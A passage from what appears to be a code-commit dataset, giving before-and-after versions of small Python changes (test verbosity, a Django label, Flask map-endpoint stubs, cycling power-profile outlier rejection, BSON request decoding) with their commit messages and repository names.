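    # The login page must advertise one /login/<provider> link per
    # configured oauth/oauth2 provider.
    page = client.get('/login').data
    for provider in config['OAUTH_CREDENTIALS']:
        assert 'href="/login/{}'.format(provider) in page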
0663793adc99b83d76578f5266e07e2ecbb4bd71
|
test/run_tests.py
|
test/run_tests.py
|
"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=2, buffer=True).run(SUITE)
|
"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=1, buffer=True).run(SUITE)
|
Make run_test output less verbose
|
Make run_test output less verbose
|
Python
|
mit
|
blairck/chess_notation
|
"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=2, buffer=True).run(SUITE)
Make run_test output less verbose
|
"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=1, buffer=True).run(SUITE)
|
<commit_before>"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=2, buffer=True).run(SUITE)
<commit_msg>Make run_test output less verbose<commit_after>
|
"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=1, buffer=True).run(SUITE)
|
"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=2, buffer=True).run(SUITE)
Make run_test output less verbose"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=1, buffer=True).run(SUITE)
|
<commit_before>"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=2, buffer=True).run(SUITE)
<commit_msg>Make run_test output less verbose<commit_after>"""This module uses unittest TestLoader to run tests"""
import sys
import unittest
if __name__ == '__main__':
sys.dont_write_bytecode = True
SUITE = unittest.TestLoader().discover(".")
unittest.TextTestRunner(verbosity=1, buffer=True).run(SUITE)
|
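For reference, TextTestRunner's verbosity levels are 0 (summary only), 1 (one dot per test), and 2 (one line per test), so the change above moves the runner from per-test lines to the dot display; buffer=True keeps the stdout/stderr of passing tests hidden in either mode:

import unittest

suite = unittest.TestLoader().discover('.')
# verbosity=1 prints a dot per test; bump back to 2 when chasing a failure.
unittest.TextTestRunner(verbosity=1, buffer=True).run(suite)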
2080c35b6708718a4014fcbb23e1de3c82d42245
|
opps/core/__init__.py
|
opps/core/__init__.py
|
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Core')
|
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Opps')
|
Change trans app label core models to CMS name
|
Change trans app label core models to CMS name
|
Python
|
mit
|
opps/opps,opps/opps,williamroot/opps,jeanmask/opps,opps/opps,YACOWS/opps,jeanmask/opps,jeanmask/opps,williamroot/opps,YACOWS/opps,jeanmask/opps,YACOWS/opps,williamroot/opps,YACOWS/opps,williamroot/opps,opps/opps
|
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Core')
Change trans app label core models to CMS name
|
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Opps')
|
<commit_before># -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Core')
<commit_msg>Change trans app label core models to CMS name<commit_after>
|
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Opps')
|
# -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Core')
Change trans app label core models to CMS name# -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Opps')
|
<commit_before># -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Core')
<commit_msg>Change trans app label core models to CMS name<commit_after># -*- coding: utf-8 -*-
from django.utils.translation import ugettext_lazy as _
trans_app_label = _('Opps')
|
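The label above uses ugettext_lazy, which matters for a module-level constant: the lazy variant defers translation until the string is rendered, so the label follows the locale active at render time instead of being frozen at import. A minimal illustration of the difference, using the Django-era API shown in the record:

from django.utils.translation import ugettext, ugettext_lazy

eager = ugettext('Opps')      # translated once, with the locale active at import
lazy = ugettext_lazy('Opps')  # a lazy proxy, translated each time it is rendered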
3e2746de9aae541880fe4cf643520a2577a3a0d5
|
tof_server/views.py
|
tof_server/views.py
|
"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
try:
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
except Exception as er_msg:
return make_response(jsonify({
'error' : str(er_msg)
}), 500)
|
"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
@app.route('/maps', methods=['POST'])
def upload_new_map():
"""Method for uploading new map"""
return jsonify({
'code' : 'dummy'
})
@app.route('/maps/<string:map_code>', methods=['GET'])
def download_map(map_code):
"""Method for downloading a map"""
return jsonify({
'code' : map_code,
'data' : 'dummy'
})
|
Add stub methods for map handling
|
Add stub methods for map handling
|
Python
|
mit
|
P1X-in/Tanks-of-Freedom-Server
|
"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
try:
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
except Exception as er_msg:
return make_response(jsonify({
'error' : str(er_msg)
}), 500)
Add stub methods for map handling
|
"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
@app.route('/maps', methods=['POST'])
def upload_new_map():
"""Method for uploading new map"""
return jsonify({
'code' : 'dummy'
})
@app.route('/maps/<string:map_code>', methods=['GET'])
def download_map(map_code):
"""Method for downloading a map"""
return jsonify({
'code' : map_code,
'data' : 'dummy'
})
|
<commit_before>"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
try:
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
except Exception as er_msg:
return make_response(jsonify({
'error' : str(er_msg)
}), 500)
<commit_msg>Add stub methods for map handling<commit_after>
|
"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
@app.route('/maps', methods=['POST'])
def upload_new_map():
"""Method for uploading new map"""
return jsonify({
'code' : 'dummy'
})
@app.route('/maps/<string:map_code>', methods=['GET'])
def download_map(map_code):
"""Method for downloading a map"""
return jsonify({
'code' : map_code,
'data' : 'dummy'
})
|
"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
try:
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
except Exception as er_msg:
return make_response(jsonify({
'error' : str(er_msg)
}), 500)
Add stub methods for map handling"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
@app.route('/maps', methods=['POST'])
def upload_new_map():
"""Method for uploading new map"""
return jsonify({
'code' : 'dummy'
})
@app.route('/maps/<string:map_code>', methods=['GET'])
def download_map(map_code):
"""Method for downloading a map"""
return jsonify({
'code' : map_code,
'data' : 'dummy'
})
|
<commit_before>"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
try:
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
except Exception as er_msg:
return make_response(jsonify({
'error' : str(er_msg)
}), 500)
<commit_msg>Add stub methods for map handling<commit_after>"""This module provides views for application."""
from tof_server import app, versioning, mysql
from flask import jsonify, make_response
import string, random
@app.route('/')
def index():
"""Server information"""
return jsonify({
'server-version' : versioning.SERVER_VERSION,
'client-versions' : versioning.CLIENT_VERSIONS
})
@app.route('/players', methods=['POST'])
def generate_new_id():
"""Method for generating new unique player ids"""
cursor = mysql.connection.cursor()
new_pin = ''
characters_pool = string.ascii_uppercase + string.digits
for _ in range(8):
new_pin = new_pin + random.SystemRandom().choice(characters_pool)
insert_sql = "INSERT INTO players (auto_pin) VALUES (%s)"
id_sql = "SELECT LAST_INSERT_ID()"
cursor.execute(insert_sql, (new_pin,))
cursor.execute(id_sql)
insert_data = cursor.fetchone()
mysql.connection.commit()
cursor.close()
return jsonify({
'id' : insert_data[0],
'pin' : new_pin
})
@app.route('/maps', methods=['POST'])
def upload_new_map():
"""Method for uploading new map"""
return jsonify({
'code' : 'dummy'
})
@app.route('/maps/<string:map_code>', methods=['GET'])
def download_map(map_code):
"""Method for downloading a map"""
return jsonify({
'code' : map_code,
'data' : 'dummy'
})
|
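The stubs above reserve the URL surface before any persistence exists; `<string:map_code>` is a Flask URL converter that binds the path segment to the view argument. The added endpoints in isolation, as a minimal runnable sketch with the mysql wiring omitted:

from flask import Flask, jsonify

app = Flask(__name__)

@app.route('/maps', methods=['POST'])
def upload_new_map():
    # Placeholder response until real map storage lands.
    return jsonify({'code': 'dummy'})

@app.route('/maps/<string:map_code>', methods=['GET'])
def download_map(map_code):
    # The converter hands the path segment to the view unchanged.
    return jsonify({'code': map_code, 'data': 'dummy'})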
757f984f37d6b3f989c7d9109a09834c2834197f
|
pipeline/compute_rpp/compute_rpp.py
|
pipeline/compute_rpp/compute_rpp.py
|
import sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.power_profile import Rpp
# The first input argument corresponds to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
|
import sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.restoration import denoise
from skcycling.power_profile import Rpp
# The first input argument corresponds to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to be considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Reject the outliers using thresholding method
power_ride = denoise.outliers_rejection(power_ride)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
|
Update the pipeline to take into account the outlier rejection method to compute the RPP
|
Update the pipeline to take into account the outlier rejection method to compute the RPP
|
Python
|
mit
|
clemaitre58/power-profile,clemaitre58/power-profile,glemaitre/power-profile,glemaitre/power-profile
|
import sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.power_profile import Rpp
# The first input argument corresponds to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to be considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
Update the pipeline to take into account the outlier rejection method to compute the RPP
|
import sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.restoration import denoise
from skcycling.power_profile import Rpp
# The first input argument corresponds to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to be considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Reject the outliers using thresholding method
power_ride = denoise.outliers_rejection(power_ride)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
|
<commit_before>import sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.power_profile import Rpp
# The first input argument corresponds to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to be considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
<commit_msg>Update the pipeline to take into account the outlier rejection method to compute the RPP<commit_after>
|
import sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.restoration import denoise
from skcycling.power_profile import Rpp
# The first input argument corresponds to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to be considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Reject the outliers using thresholding method
power_ride = denoise.outliers_rejection(power_ride)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
|
import sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.power_profile import Rpp
# The first input argument corresponds to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to be considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
Update the pipeline to take into account the outlier rejection method to compute the RPPimport sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.restoration import denoise
from skcycling.power_profile import Rpp
# The first input argument corresponds to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to be considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Reject the outliers using thresholding method
power_ride = denoise.outliers_rejection(power_ride)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
|
<commit_before>import sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.power_profile import Rpp
# The first input argument corresponds to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to be considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
<commit_msg>Update the pipeline to take into account the outlier rejection method to compute the RPP<commit_after>import sys
import os
import numpy as np
from skcycling.utils import load_power_from_fit
from skcycling.restoration import denoise
from skcycling.power_profile import Rpp
# The first input argument corresponds to the data path
data_path = sys.argv[1]
# The second input argument is the storage directory
storage_path = sys.argv[2]
# We can create a list of all the *.fit files present inside that directory
# Create a list with the files to be considered
filenames = []
for root, dirs, files in os.walk(data_path):
for file in files:
if file.endswith('.fit'):
filenames.append(os.path.join(root, file))
max_duration_rpp = 30
rpp_rider = Rpp(max_duration_rpp=max_duration_rpp)
# Open each file and fit
for idx_file, filename in enumerate(filenames):
print 'Process file #{} over {}'.format(idx_file+1, len(filenames))
# Open the file
power_ride = load_power_from_fit(filename)
# Reject the outliers using thresholding method
power_ride = denoise.outliers_rejection(power_ride)
# Fit the ride
rpp_rider.fit(power_ride)
# Create a directory to store the data if it is not existing
if not os.path.exists(storage_path):
os.makedirs(storage_path)
# Store the data somewhere
np.save(os.path.join(storage_path, 'profile.npy'), rpp_rider.rpp_)
|
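The commit above inserts `skcycling.restoration.denoise.outliers_rejection` between loading a ride and fitting the record power profile. The record does not show skcycling's actual algorithm, so the following is only a minimal sketch of what a threshold-based rejection could look like; the name `reject_outliers` and the 2500 W ceiling are illustrative assumptions, not the library's API.

```python
# Hypothetical threshold-based outlier rejection for power data.
# The real skcycling implementation may differ; names are illustrative.
import numpy as np

def reject_outliers(power, max_power=2500.0):
    """Drop implausible samples from a ride's power trace.

    Samples that are negative or exceed max_power (watts) are treated
    as sensor glitches and removed before fitting the power profile.
    """
    power = np.asarray(power, dtype=float)
    mask = (power >= 0.0) & (power <= max_power)
    return power[mask]

# Usage on a fake ride with two corrupted samples:
ride = np.array([180.0, 210.0, 65000.0, 195.0, -40.0, 220.0])
print(reject_outliers(ride))  # [180. 210. 195. 220.]
```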
d6536696f322beba321384ec58c1576b56d3eec2
|
clio/utils.py
|
clio/utils.py
|
import json
from bson import json_util
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data.
"""
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
|
import json
from bson import json_util, BSON
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data.
"""
if self.mimetype == 'application/bson':
return BSON(self.data).decode()
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
|
Add support for decoding data serialized as BSON.
|
Add support for decoding data serialized as BSON.
|
Python
|
apache-2.0
|
geodelic/clio,geodelic/clio
|
import json
from bson import json_util
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data.
"""
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
Add support for decoding data serialized as BSON.
|
import json
from bson import json_util, BSON
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
parsed JSON data.
"""
if self.mimetype == 'application/bson':
return BSON(self.data).decode()
if self.mimetype in ('application/json','application/extjson'):
if 'ext' in self.mimetype:
objhook = json_util.object_hook
else:
objhook = None
request_charset = self.mimetype_params.get('charset')
if request_charset is not None:
j = json.loads(self.data, encoding=request_charset, object_hook=objhook )
else:
j = json.loads(self.data, object_hook=objhook)
return j
|
<commit_before>
import json
from bson import json_util
from flask.wrappers import Request, cached_property
def getBoolean(string):
if string is None:
return False
return {
'1': True, 'yes': True, 'true': True, 'on': True,
'0': False, 'no': False, 'false': False, 'off': False, '': False, None: False
}[string.lower()]
class ExtRequest(Request):
@cached_property
def json(self):
"""If the mimetype is `application/json` this will contain the
